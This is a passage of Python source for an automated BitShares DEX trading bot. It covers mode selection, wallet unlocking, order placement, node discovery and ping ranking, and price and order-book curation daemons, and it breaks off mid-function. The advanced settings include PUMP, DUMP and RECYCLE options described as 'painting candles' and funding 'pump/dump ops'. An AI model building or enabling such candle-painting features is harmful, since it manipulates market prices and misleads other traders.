Bitshares core developers and node admin
Move to github:
https://github.com/litepresence/extinction-event
New MODES:
SALES mode backtest only plots buy/sell actions; no state machine
LATENCY mode connect to all nodes and reports on latency
PAPER mode runs live, but does not trade
'''
#===================================================================
''' DEPENDENCIES'''
#===================================================================
'''
python 3.4
python-tk
matplotlib 1.4
pybitshares
h/t @ cryptocompare.com
'''
# USER CONTROLS
def tune_install():  # Basic User Controls
    """Set the pair selection and strategy tuning globals to stock values."""
    global CURRENCY, ASSET, MA1, MA2
    global SELLOFF, SUPPORT, RESISTANCE, DESPAIR
    global MIN_CROSS, MAX_CROSS, BULL_STOP, BEAR_STOP
    global DPT, ROI, APY
    # performance metrics all start at unity
    APY = 1.0
    DPT = 1.0
    ROI = 1.0
    # market selection
    CURRENCY = "BTC"
    # INSTALL KEYS
    ASSET = "BTS"
    # moving average periods, in days
    MA1 = 17.00
    MA2 = 50.00
    # bull/bear threshold multipliers applied to the moving averages
    SELLOFF = 2.250
    SUPPORT = 1.000
    RESISTANCE = 1.000
    DESPAIR = 0.525
    # cross confirmation and stop loss multipliers
    MIN_CROSS = 1.000
    MAX_CROSS = 1.000
    BULL_STOP = 1.000
    BEAR_STOP = 1.000
def control_panel():  # Advanced User Controls
    """Set advanced tuning globals, then derive mode flags from MODE.

    Reads MODE / CURRENCY / ASSET / MA1 / MA2 / SATOSHI / ANTISAT and
    writes the remaining strategy, plotting, and timing globals,
    including the derived DEPTH and PAIR values.
    """
    global LIVE, CURRENCY, ASSET, MA1, MA2, MA3, MA4, RECYCLE
    global PETTY, MIN_MARGIN, TICK, TICK_TIMING, TICK_MINIMUM, DUMP
    global CANDLE, START_ASSETS, START_CURRENCY, ICEBERG
    global ANIMATE, STORAGE_RESET, CURRENCY_STOP, MAX_CURRENCY, PUMP
    global LIVE_PLOT_DEPTH, BELL, FORCE_ALPHA, PAPER, LATENCY
    global DEPTH, BACKTEST, PAIR, MAX_ASSETS, SALES
    global RESOLUTION, OPTIMIZATIONS, MARKET_CROSS, OPTIMIZE, SCALP
    global MANUAL_OVERRIDE, MANUAL_BUY, MANUAL_SELL
    # optimizer search parameters
    RESOLUTION = 20
    OPTIMIZATIONS = 10000
    # backtest starting balances
    START_ASSETS = 0
    START_CURRENCY = 1
    # initial backtest market state (True is "BULL")
    MARKET_CROSS = True
    # max percent may invest in:
    # 100 = "all in" ; 10 = "10 percent in"
    MAX_ASSETS = 50
    MAX_CURRENCY = 100
    # iceberg order slicing
    ICEBERG = 1  # currency terms
    PETTY = 100000  # assets terms
    # scalp thresholds
    # ENTER OWN RISK &&&&
    SCALP = False  # maintain market maker iceberg margins
    PUMP = False  # paint candles green (this costs money)
    DUMP = False  # paint candles red (this costs money)
    RECYCLE = False  # maintain funding for pump/dump ops
    SCALP_FUND = 0.010  # 0.01 = 1% of holdings reserved for scalping
    MIN_MARGIN = 0.030  # about 0.030
    MA3 = 0.500  # about 0.500
    MA4 = 0.166  # about 0.166
    # force buy/sell thresholds manually
    MANUAL_OVERRIDE = False
    MANUAL_BUY = SATOSHI
    MANUAL_SELL = ANTISAT
    # Manual Override Alpha State when live
    FORCE_ALPHA = False  # Options: ( False, 'BULL', 'BEAR' )
    # hft timing in seconds
    TICK = 60
    TICK_TIMING = 51
    TICK_MINIMUM = 30
    # backtest plotting switches
    ANIMATE = False
    STORAGE_RESET = False
    CURRENCY_STOP = False
    # live window
    LIVE_PLOT_DEPTH = 86400  # 86400 = 1 day
    BELL = False  # sound linux alarm when tick fails
    # defaults before the MODE dispatch below
    CANDLE = 86400
    OPTIMIZE = BACKTEST = PAPER = LIVE = SALES = LATENCY = False
    # MODE: 0 OPTIMIZE, 1 BACKTEST, 2 PAPER, 3 LIVE, 4 SALES, 5 LATENCY
    if MODE == 0:
        OPTIMIZE = True
    elif MODE == 1:
        BACKTEST = True
        OPTIMIZATIONS = 0
    elif MODE == 4:
        BACKTEST = True
        SALES = True
        OPTIMIZATIONS = 0
    elif MODE == 5:
        LATENCY = True
    # PAPER zeroes spend limits before the LIVE banner prints them
    if MODE == 2:
        PAPER = True
        MAX_ASSETS = 0
        MAX_CURRENCY = 0
    if MODE in (2, 3):
        LIVE = True
        CANDLE = 7200
        OPTIMIZATIONS = 0
        print(('BOT MAY SPEND: ', MAX_ASSETS, 'PERCENT CURRENCY'))
        print(('BOT MAY LIQUIDATE: ', MAX_CURRENCY, 'PERCENT ASSETS'))
    DEPTH = int(max(MA1, MA2) * (86400 / CANDLE) + 50)
    PAIR = ('%s_%s' % (CURRENCY, ASSET))
# BITSHARES DEX
def keys_install(): # Bitshares Keys
    """Prompt for trading MODE, account name and pass phrase, then connect.

    Side effects: sets the MODE / Bit* pair globals, and for PAPER or
    LIVE modes unlocks the wallet against a hard-coded seed node list
    and sets ACCOUNT / MARKET / CHAIN.  Exits the process outright if
    the account lookup or wallet unlock fails.  Always ends by
    refreshing nodes.txt via nodes_update().
    """
    global BitCURRENCY, BitASSET, ACCOUNT, PASS_PHRASE
    global BitPAIR, MARKET, CHAIN, MODE
    # 999 is a sentinel so the prompt loops until a valid mode is typed
    MODE = 999
    print('0:OPTIMIZE, 1:BACKTEST, 2:PAPER, 3:LIVE, 4:SALES, 5: LATENCY')
    while MODE not in [0, 1, 2, 3, 4, 5]:
        MODE = int(input('TRADING MODE: '))
    print('')
    # gateway-prefixed symbols; BTS itself is native (no OPEN. prefix)
    BitCURRENCY = 'OPEN.' + CURRENCY
    if ASSET == 'BTS':
        BitASSET = 'BTS'
    else:
        BitASSET = 'OPEN.' + ASSET
    BitPAIR = BitASSET + ":" + BitCURRENCY
    # credentials are only needed for PAPER (2) and LIVE (3) sessions
    if MODE in [2, 3]:
        try:
            ACCOUNT = Account(input(' account: '))
        except Exception as ex:
            print (type(ex).__name__)
            sys.exit()
        PASS_PHRASE = getpass(prompt=' pass phrase: ')
        # seed node list used only for this initial connection;
        # nodes_update() below replaces it with measured low-latency nodes
        n = ['wss://us.nodes.bitshares.works/wss',
             'wss://us.nodes.bitshares.ws/wss',
             'wss://eu-west-1.bts.crypto-bridge.org/wss',
             'wss://eu.nodes.bitshares.ws/wss',
             'wss://us-east-1.bts.crypto-bridge.org/wss']
        MARKET = Market(BitPAIR, bitshares_instance=BitShares(n), mode='head')
        try:
            MARKET.bitshares.wallet.unlock(PASS_PHRASE)
        except Exception as ex:
            print (type(ex).__name__)
            sys.exit()
        print('')
        CHAIN = Blockchain(bitshares_instance=BitShares(n), mode='head')
    nodes_update()
def race_read(doc=''):  # Concurrent Read from File Operation
    """Read and literal-eval *doc*, retrying forever until a read succeeds.

    Used for lock-free IPC between the daemon processes; a concurrent
    writer may hold the file mid-write, in which case we just retry.
    """
    while True:
        try:
            with open(doc, 'r') as handle:
                parsed = literal(handle.read())
            return parsed
        except Exception as error:
            print(error, type(error).__name__, error.args)
            print(str(doc) + ' RACE READ, try again...')
def race_write(doc='', text=''):  # Concurrent Write to File Operation
    """Overwrite *doc* with str(text), retrying forever until it succeeds.

    Counterpart of race_read(); tolerates transient failures caused by
    concurrent readers of the same IPC file.
    """
    while True:
        try:
            with open(doc, 'w+') as handle:
                handle.write(str(text))
            return
        except Exception as error:
            print(error, type(error).__name__, error.args)
            print(str(doc) + ' RACE WRITE, try again...')
def race_append(doc='', text=''):  # Concurrent Append to File Operation
    """Append str(text) to *doc*, retrying forever until it succeeds.

    Bug fix: the file was previously opened as the literal name 'doc'
    (a quoted string), so every append - e.g. the blacklist.txt log
    written by last_process() - landed in a stray file called "doc"
    instead of the requested path.
    """
    opened = 0
    while not opened:
        try:
            # was open('doc', 'a+'): wrote to the wrong file
            with open(doc, 'a+') as f:
                f.write(str(text))
                opened = 1
        except Exception as e:
            print (e, type(e).__name__, e.args)
            print (str(doc) + ' RACE APPEND, try again...')
            pass
def dex(  # Public AND Private API Bitshares
        command, amount=ANTISAT, price=None,
        depth=1, expiration=ANTISAT):
    """Unified Bitshares DEX gateway used by the rest of the bot.

    command is one of: 'buy', 'sell', 'cancel', 'orders',
    'market_balances', 'complete_balances', 'book', 'last',
    'account_value', 'blocktime'.  Connection setup rotates through the
    nodes.txt list until a node answers; trading commands retry up to
    10 times before aborting.

    Bug fixed here: the 'orders' branch printed ``server[0]`` (an
    undefined name) instead of ``servers[0]`` when a node was down,
    raising NameError instead of reporting the outage.
    """
    # (re)connect market, chain, wallet and account; rotate nodes on failure
    attempt = 1
    nds = nodes()
    while attempt:
        try:
            MARKET = Market(
                BitPAIR, bitshares_instance=BitShares(nds), mode='head')
            CHAIN = Blockchain(
                bitshares_instance=BitShares(nds), mode='head')
            MARKET.bitshares.wallet.unlock(PASS_PHRASE)
            ACCOUNT.refresh()
            attempt = 0
        except Exception as ex:
            print (type(ex).__name__, ex.args)
            print (nds)
            print (BitPAIR, attempt, time.ctime())
            attempt += 1
            nd = nds.pop(0)
            nds.append(nd)
            print (nd)
            pass
    if command == 'buy':
        # buy relentlessly until satisfied or currency exhausted
        print(('Bitshares API', command))
        if price is None:
            price = ANTISAT
        print(('buying', amount, 'at', price))
        attempt = 1
        currency = float(ACCOUNT.balance(BitCURRENCY))
        # leave 0.2% headroom for transaction fees
        if amount > 0.998 * currency * price:
            amount = 0.998 * currency * price
        if amount > 0:
            while attempt:
                try:
                    details = (MARKET.buy(price, amount, expiration))
                    print (details)
                    attempt = 0
                except:
                    print(("buy attempt %s failed" % attempt))
                    attempt += 1
                    if attempt > 10:
                        print ('buy aborted')
                        return
                    pass
        else:
            print('no currency to buy')
    if command == 'sell':
        # sell relentlessly until satisfied or assets exhausted
        # NOTE(review): the expiration argument is overridden to one
        # week for sells only - confirm this asymmetry is intentional
        expiration = 86400 * 7
        print(('Bitshares API', command))
        if price is None:
            price = SATOSHI
        print(('selling', amount, 'at', price))
        attempt = 1
        assets = float(ACCOUNT.balance(BitASSET))
        if amount > 0.998 * assets:
            amount = 0.998 * assets
        if amount > 0:
            while attempt:
                try:
                    details = (MARKET.sell(price, amount, expiration))
                    print (details)
                    attempt = 0
                except:
                    print(("sell attempt %s failed" % attempt))
                    attempt += 1
                    if attempt > 10:
                        print ('sell aborted')
                        return
                    pass
        else:
            print('no assets to sell')
    if command == 'cancel':
        # cancel all orders in this MARKET relentlessly until satisfied
        print(('Bitshares API', command))
        orders = MARKET.accountopenorders()
        print((len(orders), 'open orders to cancel'))
        if len(orders):
            attempt = 1
            order_list = []
            for order in orders:
                order_list.append(order['id'])
            while attempt:
                try:
                    details = MARKET.cancel(order_list)
                    print (details)
                    attempt = 0
                except:
                    print((attempt, 'cancel failed', order_list))
                    attempt += 1
                    if attempt > 10:
                        print ('cancel aborted')
                        return
                    pass
    if command == 'orders':
        # cycle through nodes until triplicate-consecutive is found
        servers = nodes()
        orders_list = []
        satisfied = 0
        while not satisfied:
            sorders = [str(i) for i in orders_list]
            if (len(sorders) >= 3) and len(set(sorders[-3:])) == 1:
                orders = orders_list[-1]
                satisfied = 1
            else:
                try:
                    market = Market(
                        BitPAIR,
                        bitshares_instance=BitShares(
                            servers[0],
                            num_retries=0))
                except:
                    # fix: was `server[0]` (undefined name / NameError)
                    print('dex orders server down %s' % servers[0])
                    pass
                # NOTE(review): if the Market() call above failed,
                # `market` may be unbound here; also the orders below
                # are read from the global MARKET, not the per-node
                # `market` just built - confirm intent
                market.bitshares.wallet.unlock(PASS_PHRASE)
                ACCOUNT.refresh()
                # dictionary of open orders in traditional format:
                # orderNumber, orderType, market, amount, price
                print(('Bitshares API', command))
                orders = []
                for order in MARKET.accountopenorders():
                    orderNumber = order['id']
                    asset = order['base']['symbol']
                    currency = order['quote']['symbol']
                    amount = float(order['base'])
                    price = float(order['price'])
                    orderType = 'buy'
                    if asset == BitASSET:
                        orderType = 'sell'
                        price = 1 / price
                    orders.append({'orderNumber': orderNumber,
                                   'orderType': orderType,
                                   'market': BitPAIR,
                                   'amount': amount,
                                   'price': price})
                orders_list.append(orders)
                servers.append(servers.pop(0))  # cycle server list
        for o in orders:
            print (o)
        if len(orders) == 0:
            print ('no open orders')
        return orders
    if command == 'market_balances':
        # dictionary of currency and assets in this MARKET
        print(('Bitshares API', command))
        currency = float(ACCOUNT.balance(BitCURRENCY))
        assets = float(ACCOUNT.balance(BitASSET))
        balances = {'currency': currency, 'assets': assets}
        print (balances)
        return balances
    if command == 'complete_balances':
        # dictionary of ALL account balances
        print(('Bitshares API', command))
        raw = list(ACCOUNT.balances)
        balances = {}
        for i in range(len(raw)):
            balances[raw[i]['symbol']] = float(raw[i]['amount'])
        print (balances)
        return balances
    if command == 'book':
        # order book is maintained by the background book daemon
        return race_read('book.txt')
    if command == 'last':
        # last price is maintained by the background last daemon
        return race_read('last.txt')
    if command == 'account_value':
        # dictionary account value in BTS BTC and USD
        print(('Bitshares API', command))
        raw = list(ACCOUNT.balances)
        balances = {}
        for i in range(len(raw)):
            balances[raw[i]['symbol']] = float(raw[i]['amount'])
        btc_value = 0
        for asset, amount in list(balances.items()):
            market_pair = 'OPEN.BTC:' + asset
            market = Market(market_pair)
            price = float(market.ticker()['latest'])
            try:
                value = amount / price
            except:
                value = 0
            # dust balances below 0.0001 BTC are ignored
            if value < 0.0001:
                value = 0
            else:
                if asset != 'USD':
                    price = 1 / (price + SATOSHI)
                print((('%.4f' % value), 'OPEN.BTC', ('%.2f' % amount),
                       asset, '@', ('%.8f' % price)))
            btc_value += value
        market_pair = 'OPEN.BTC:USD'
        market = Market(market_pair)
        price = float(market.ticker()['latest'])
        usd_value = btc_value * price
        market_pair = 'OPEN.BTC:BTS'
        market = Market(market_pair)
        price = float(market.ticker()['latest'])
        bts_value = btc_value * price
        print((('%.2f' % bts_value), 'BTS',
               ('%.4f' % btc_value), 'OPEN.BTC',
               ('%.2f' % usd_value), 'bitUSD'))
        return bts_value, btc_value, usd_value
    if command == 'blocktime':
        # report head block number plus block latency and ping latency
        start = time.time()
        current_block = CHAIN.get_current_block_num()
        ping = time.time() - start
        blocktime = CHAIN.block_time(current_block)
        blocktimestamp = CHAIN.block_timestamp(current_block)
        now = time.time()
        block_latency = now - blocktimestamp
        print(('block :', current_block))
        # print(('blocktime :', blocktime))
        # print(('stamp :', blocktimestamp))
        # print(('ctime(stamp) :', time.ctime(blocktimestamp)))
        # print(('now :', now))
        print(('dex blocktime :', ('%.2f' % block_latency)))
        print(('dex ping :', ('%.2f' % ping)))
        return current_block, blocktimestamp, block_latency, ping
def nodes():  # Fetch nodes.txt
    """Return the current low-latency node list maintained in nodes.txt."""
    filename = 'nodes.txt'
    return race_read(filename)
def nodes_process(  # Write nodes.txt
        timeout=20, pings=999999, crop=99, noprint=False, write=False,
        include=False, exclude=False, suffix=True, master=False):
    """Discover, ping and rank public Bitshares nodes; maintain nodes.txt.

    Node URLs are scraped from the bitshares-ui (and related) GitHub
    repos, deduplicated and normalized, then each candidate is pinged
    in a subprocess with a hard *timeout*; responsive mainnet nodes
    are sorted by latency and the best *crop* are optionally written
    to nodes.txt for the rest of the bot.  Returns the ranked list.
    """
    # mainnet chain id; a node reporting any other id is a testnet
    ID = '4018d7844c78f6a6c41c6a552b898022310fc5dec06da467ee7905a8dad512c8'
    # timeout : seconds to ping until abort per node
    # pings : # of good nodes to find until satisfied (0 none, 999 all)
    # suffix : checks each node for no suffix plus with /ws or /wss
    # noprint : disables printing, only returns list of good nodes
    # master : check only nodes listed in bitshares/ui/master
    # crop : return only best nodes
    # write : maintains an output file nodes.txt with list of best nodes
    # include and exclude custom nodes
    included, excluded = [], []
    if include:
        included = ['wss://bts-seoul.clockwork.gr']
    if exclude:
        excluded = []
    # web scraping methods
    def clean(raw):
        # strip quotes and commas so parse() can split on whitespace
        return ((str(raw).replace('"', " "))
                .replace("'", " ")).replace(',', ' ')
    def parse(cleaned):
        # keep only websocket URLs
        return [t for t in cleaned.split() if t.startswith('wss')]
    def validate(parsed):
        # normalize each URL to a bare host, then re-apply suffixes
        v = parsed
        for i in range(len(v)):
            if v[i].endswith('/'):
                v[i] = v[i][:-1]
        for i in range(len(v)):
            if v[i].endswith('/ws'):
                v[i] = v[i][:-3]
        for i in range(len(v)):
            if v[i].endswith('/wss'):
                v[i] = v[i][:-4]
        # these are known to require /ws extension
        ws = ['wss://relinked.com',
              'wss://bitshares.crypto.fans',
              'wss://this.uptick.rocks']
        if suffix:
            # test every host bare plus with /wss and /ws variants
            wss = [(i + '/wss') for i in v]
            ws = [(i + '/ws') for i in v]
            v = v + wss + ws
        else:
            for i in range(len(v)):
                if v[i] in ws:
                    v[i] += '/ws'
                else:
                    v[i] += '/wss'
        return v
    # ping the blockchain and return latency
    def ping(n, num, arr):
        # runs in a child Process; communicates back via shared `num`:
        # 111111 stale head, 222222 down, 333333 testnet, 999999 timeout
        # NOTE(review): `arr` is an empty shared Array that is never used
        try:
            start = time.time()
            chain = Blockchain(
                bitshares_instance=BitShares(n, num_retries=0), mode='head')
            # print(n,chain.rpc.chain_params["chain_id"])
            ping_latency = time.time() - start
            current_block = chain.get_current_block_num()
            blocktimestamp = abs(
                chain.block_timestamp(current_block))  # + utc_offset)
            block_latency = time.time() - blocktimestamp
            # print (blocktimestamp)
            # print (time.time())
            # print (block_latency)
            # print (ping_latency)
            # print (time.ctime())
            # print (utc_offset)
            # print (chain.get_network())
            if chain.get_network()['chain_id'] != ID:
                num.value = 333333
            elif block_latency < (ping_latency + 4):
                num.value = ping_latency
            else:
                num.value = 111111
        except:
            num.value = 222222
            pass
    # Disable / Enable printing
    def blockPrint():
        if noprint:
            sys.stdout = open(os.devnull, 'w')
    def enablePrint():
        if noprint:
            sys.stdout = sys.__stdout__
    # gather list of nodes from github
    blockPrint()
    begin = time.time()
    utc_offset = (datetime.fromtimestamp(begin) -
                  datetime.utcfromtimestamp(begin)).total_seconds()
    print ('=====================================')
    print(('found %s nodes stored in script' % len(included)))
    urls = []
    # scrape from github
    git = 'https://raw.githubusercontent.com'
    url = git + '/bitshares/bitshares-ui/master/app/api/apiConfig.js'
    urls.append(url)
    if not master:
        url = git + '/bitshares/bitshares-ui/staging/app/api/apiConfig.js'
        urls.append(url)
        url = git + '/CryptoBridge/cryptobridge-ui/'
        url += 'e5214ad63a41bd6de1333fd98d717b37e1a52f77/app/api/apiConfig.js'
        urls.append(url)
        url = git + '/litepresence/extinction-event/master/bitshares-nodes.py'
        urls.append(url)
    # searched selected sites for Bitshares nodes
    validated = [] + included
    for u in urls:
        # up to 3 fetch attempts per source
        attempts = 3
        while attempts > 0:
            try:
                raw = requests.get(u).text
                v = validate(parse(clean(raw)))
                print(('found %s nodes at %s' % (len(v), u[:65])))
                validated += v
                attempts = 0
            except:
                print(('failed to connect to %s' % u))
                attempts -= 1
                pass
    # remove known bad nodes from test
    if len(excluded):
        excluded = sorted(excluded)
        print(('remove %s known bad nodes' % len(excluded)))
        validated = [i for i in validated if i not in excluded]
    validated = sorted(list(set(validate(parse(clean(validated))))))
    # attempt to contact each websocket
    print ('=====================================')
    print(('found %s total nodes - no duplicates' % len(validated)))
    print ('=====================================')
    print (validated)
    pinging = min(pings, len(validated))
    if pinging:
        print ('=====================================')
        enablePrint()
        print(('%s pinging %s nodes; timeout %s sec; est %.1f minutes' % (
            time.ctime(), pinging, timeout, timeout * len(validated) / 60.0)))
        blockPrint()
        print ('=====================================')
    pinged, timed, down, stale, expired, testnet = [], [], [], [], [], []
    for n in validated:
        if len(pinged) < pinging:
            # use multiprocessing module to enforce timeout
            num = Value('d', 999999)
            arr = Array('i', list(range(0)))
            p = Process(target=ping, args=(n, num, arr))
            p.start()
            p.join(timeout)
            if p.is_alive() or (num.value > timeout):
                p.terminate()
                p.join()
            # bucket the node by the sentinel written into num.value
            if num.value == 111111:  # head block is stale
                stale.append(n)
            elif num.value == 222222:  # connect failed
                down.append(n)
            elif num.value == 333333:  # connect failed
                testnet.append(n)
            elif num.value == 999999:  # timeout reached
                expired.append(n)
            else:
                pinged.append(n)  # connect success
                timed.append(num.value)  # connect success time
                print(('ping:', ('%.2f' % num.value), n))
    # sort websockets by latency
    pinged = [x for _, x in sorted(zip(timed, pinged))]
    timed = sorted(timed)
    unknown = sorted(
        list(set(validated).difference(
            pinged + down + stale + expired + testnet)))
    # report outcome
    if len(excluded):
        for i in range(len(excluded)):
            print(('EXCLUDED', excluded[i]))
    if len(unknown):
        for i in range(len(unknown)):
            print(('UNTESTED', unknown[i]))
    if len(testnet):
        for i in range(len(testnet)):
            print(('TESTNET', testnet[i]))
    if len(expired):
        for i in range(len(expired)):
            print(('TIMEOUT', expired[i]))
    if len(stale):
        for i in range(len(stale)):
            print(('STALE', stale[i]))
    if len(down):
        for i in range(len(down)):
            print(('DOWN', down[i]))
    if len(pinged):
        print ('')
        print ('GOOD nodes:')
        print ('')
        for i in range(len(pinged)):
            print((('%.2f' % timed[i]), pinged[i]))
        if pinging:
            print('')
            print((len(pinged), 'of', len(validated),
                   'nodes are active with latency less than', timeout))
            print('')
            print(
                ('fastest node',
                 pinged[0],
                 'with latency',
                 ('%.2f' % timed[0])))
            print('')
        ret = pinged[:crop]
    else:
        # nothing answered; fall back to the unpinged candidate list
        ret = validated[:crop]
        print ('')
    enablePrint()
    elapsed = time.time() - begin
    print ('elapsed:', ('%.1f' % elapsed), 'TOP ', len(ret))
    print('')
    print (ret)
    # only publish a full-size result; a short list means discovery failed
    if write and (len(ret) == crop):
        race_write('nodes.txt', text=ret)
    return (ret)
def nodes_loop():  # Run nodes process in loop
    """Daemon loop: refresh nodes.txt every five minutes, forever."""
    while True:
        try:
            nodes_process(
                timeout=5, pings=999, crop=10, noprint=True, write=True,
                include=True, exclude=False, suffix=False, master=False)
            time.sleep(300)
        except Exception as error:
            # no matter what happens just keep verifying book
            print(type(error).__name__, error.args, error)
def nodes_update():  # Run nodes process once
    """Block until nodes.txt has been refreshed once, then report success."""
    print('Acquiring low latency connection to Bitshares DEX' +
          ', this may take a few minutes...')
    refreshed = False
    try:
        # not satisfied until verified once
        while not refreshed:
            nodes_process(
                timeout=5, pings=999, crop=10, noprint=False, write=True,
                include=True, exclude=False, suffix=False, master=False)
            refreshed = True
    except Exception as error:
        print(type(error).__name__, error.args, error)
    print('')
    print('DEX CONNECTION ESTABLISHED - will refresh every 5 minutes')
    print('')
def last_process(): # Write last.txt
    """Sample the latest DEX price from up to 5 nodes; write last.txt.

    Curation: identical quotes are taken at face value, otherwise the
    statistical mode (falling back to median) is used; when the sample
    spread is under 2% the most recent quote wins.  Wide spreads are
    appended to blacklist.txt for later node vetting.
    """
    def dex_last(market):  # returns latest price on given market(node)
        return float(market.ticker()['latest'])
    def market(n):  # returns market class using node "n"
        return Market(BitPAIR, bitshares_instance=BitShares(n, num_retries=0))
    # fetch list of good nodes from file maintained by nodes.py
    node_list = nodes()
    # fetch last price from 5 dex nodes
    start = time.time()
    last_list = []
    nodes_used = []
    for i in range(len(node_list)):
        if len(last_list) < 5:
            try:
                m = market(node_list[i])
                ret = satoshi(dex_last(m))
                last_list.append(ret)
                nodes_used.append(node_list[i])
            except:
                # unreachable node: just try the next one
                pass
    # calculate relative range
    rrange = (max(last_list) - min(last_list)) / mean(last_list)
    # check last list and return best last price with message
    msg = ''
    if len(set(last_list)) == 1:
        last = last_list[-1]
        msg += 'common'
    else:
        try:
            # mode() raises when no value repeats; fall back to median
            last = mode(last_list)
            msg += 'mode'
        except:
            last = median(last_list)
            msg += 'median'
        # override median or mode with latest if less than 2%
        # difference
        if rrange < 0.02:
            last = last_list[-1]
            msg = 'latest (' + msg + ')'
        else:
            # create blacklist.txt if relative range too wide
            print('')
            print(time.ctime(), str(last), str(rrange))
            print(str(last_list))
            print(str(nodes_used))
            blacklist = ''
            blacklist += "\n" + "\n" + str(time.ctime())
            blacklist += "\n" + str(last)
            blacklist += "\n" + str(rrange)
            blacklist += "\n" + str(last_list)
            blacklist += "\n" + str(nodes_used)
            race_append('blacklist.txt', blacklist)
    # maintain a log of last price, relative range, and statistics type
    last = satoshi(last)
    elapsed = '%.1f' % (time.time() - start)
    print (('%.8f' % last), clock(), 'elapsed: ', elapsed,
           'nodes: ', len(last_list), 'type: ', ('%.3f' % rrange), msg)
    # update communication file last.txt
    race_write('last.txt', text=last)
def last_loop():  # Run last process in loop
    """Daemon loop: refresh last.txt every 30 seconds, forever."""
    while True:
        try:
            last_process()
            time.sleep(30)
        except Exception as error:
            # no matter what happens just keep verifying book
            print(type(error).__name__, error.args, error)
def last_update():  # Run last process once
    """Block until last.txt has been written once."""
    refreshed = False
    try:
        # not satisfied until verified once
        while not refreshed:
            last_process()
            refreshed = True
    except Exception as error:
        print(type(error).__name__, error.args, error)
def book_process(): # Write book.txt
    """Poll up to NODES dex nodes for the orderbook; write book.txt.

    Curation cascade: (1) accept three identical consecutive books;
    (2) else accept the statistical mode of the sampled books;
    (3) else take the element-wise median and, if that produces an
    invalid book, reconstruct a monotonic bid/ask ladder from the
    pooled prices.  The accepted book is written to book.txt.
    """
    # smallest price nudge used when de-duplicating reconstructed ladders
    DFLOAT = 0.0000000000000001
    NODES = 5
    def dex_book(market, depth=10):  # returns latest orderbook
        # dictionary of 4 lists containing bid/ask volume/price
        raw = market.orderbook(limit=depth)
        bids = raw['bids']
        asks = raw['asks']
        bidp = [float(bids[i]['price']) for i in range(len(bids))]
        bidv = [float(bids[i]['quote']) for i in range(len(bids))]
        askp = [float(asks[i]['price']) for i in range(len(asks))]
        askv = [float(asks[i]['quote']) for i in range(len(asks))]
        book = {'bidp': bidp, 'bidv': bidv, 'askp': askp, 'askv': askv}
        # sanity squawk: bids summing above asks means a corrupt book
        if sum(bidp) > sum(askp):
            print ('WTF IS THIS SHIT?')
            print (book)
        return book
    def market(n):  # returns market class using node "n"
        return Market(BitPAIR, bitshares_instance=BitShares(
            n, num_retries=0))
    # counts which curation path produced each accepted book
    tally = {'triple': 0, 'mode': 0, 'median': 0, 'built': 0}
    # fetch list of good nodes from file maintained by nodes.py
    node_list = nodes()
    # fetch last price from 5 dex nodes
    start = time.time()
    middles = []
    book_list = []
    nodes_used = []
    test = []
    msg = ''
    for i in range(len(node_list)):
        triplicate = 0
        if (len(book_list) < NODES) and not triplicate:
            try:
                m = market(node_list[i])
                ret = dex_book(m)
                book_list.append(ret)
                nodes_used.append(node_list[i])
                test.append(i)
            except:
                pass
        # accept early when the last three sampled books agree exactly
        sbooks = [str(i) for i in book_list]
        if (len(sbooks) >= 3) and len(set(sbooks[-3:])) == 1:
            book = book_list[-1]
            asksort = sorted(book['askp'])
            bidsort = sorted(book['bidp'], reverse=True)
            # a valid book: sorted, duplicate-free, best bid < best ask
            if ((asksort == book['askp']) and
                    (bidsort == book['bidp']) and
                    (len(set(asksort)) == len(asksort)) and
                    (len(set(bidsort)) == len(bidsort)) and
                    (bidsort[0] < asksort[0])):
                msg += 'triplicate book'
                triplicate = 1
                tally['triple'] += 1
                break
            else:
                msg += 'triplicate book error - '
    if triplicate == 0:
        # check last list and return best last price with message
        try:
            book = literal(mode([str(i) for i in book_list]))
            asksort = sorted(book['askp'])
            bidsort = sorted(book['bidp'], reverse=True)
            if 0:
                if (asksort != book['askp']):
                    print('asksort')
                if (bidsort != book['bidp']):
                    print('bidsort')
                if (len(set(asksort)) != len(asksort)):
                    print('askmatch')
                if (len(set(bidsort)) != len(bidsort)):
                    print('bidmatch')
                if (bidsort[0] > asksort[0]):
                    print('mismatched')
            if ((asksort == book['askp']) and
                    (bidsort == book['bidp']) and
                    (len(set(asksort)) == len(asksort)) and
                    (len(set(bidsort)) == len(bidsort)) and
                    (bidsort[0] < asksort[0])):
                msg += 'mode book'
                tally['mode'] += 1
            else:
                # invalid mode book: fall through to the median path
                raise
        except:
            # element-wise median across the sampled books
            book = {i: list(np.median([x[i] for x in book_list], axis=0))
                    for i in ['bidp', 'bidv', 'askp', 'askv']}
            asksort = sorted(book['askp'])
            bidsort = sorted(book['bidp'], reverse=True)
            if 0:
                if (asksort != book['askp']):
                    print('asksort')
                if (bidsort != book['bidp']):
                    print('bidsort')
                if (len(set(asksort)) != len(asksort)):
                    print('askmatch')
                if (len(set(bidsort)) != len(bidsort)):
                    print('bidmatch')
                if (bidsort[0] > asksort[0]):
                    print('mismatched')
            if ((asksort == book['askp']) and
                    (bidsort == book['bidp']) and
                    (len(set(asksort)) == len(asksort)) and
                    (len(set(bidsort)) == len(bidsort)) and
                    (bidsort[0] < asksort[0])):
                msg += '!!! MEDIAN BOOK !!!'
                tally['median'] += 1
            else:
                # print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
                # book['askp'][:3],1)
                msg += '!!! RECONSTRUCTED BOOK !!! *****'
                tally['built'] += 1
                # assure median comprehension did not reorganize book
                # prices
                prices = []
                prices = prices + book['askp'] + book['bidp']
                prices = sorted(prices)
                z = len(prices)
                # split pooled prices: lower half bids, upper half asks
                book['askp'] = prices[int(z / 2):z]
                book['bidp'] = prices[0:int(z / 2)]
                book['askp'] = sorted(book['askp'])
                book['bidp'] = sorted(book['bidp'], reverse=True)
                # print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
                # book['askp'][:3],2)
                # nudge apart a touching best bid/ask
                if book['bidp'][0] == book['askp'][0]:
                    book['askp'] = [(i + DFLOAT)
                                    for i in book['askp']]
                    book['bidp'] = [(i - DFLOAT)
                                    for i in book['bidp']]
                # print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
                # book['askp'][:3],3)
                # force asks strictly increasing
                for i in list(range(1, len(book['askp']))):
                    if book['askp'][i] <= book['askp'][i - 1]:
                        book['askp'][i] = max(
                            (book['askp'][i - 1] + DFLOAT),
                            book['askp'][i])
                # print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
                # book['askp'][:3],4)
                # force bids strictly decreasing
                for i in list(range(1, len(book['bidp']))):
                    if book['bidp'][i] >= book['bidp'][i - 1]:
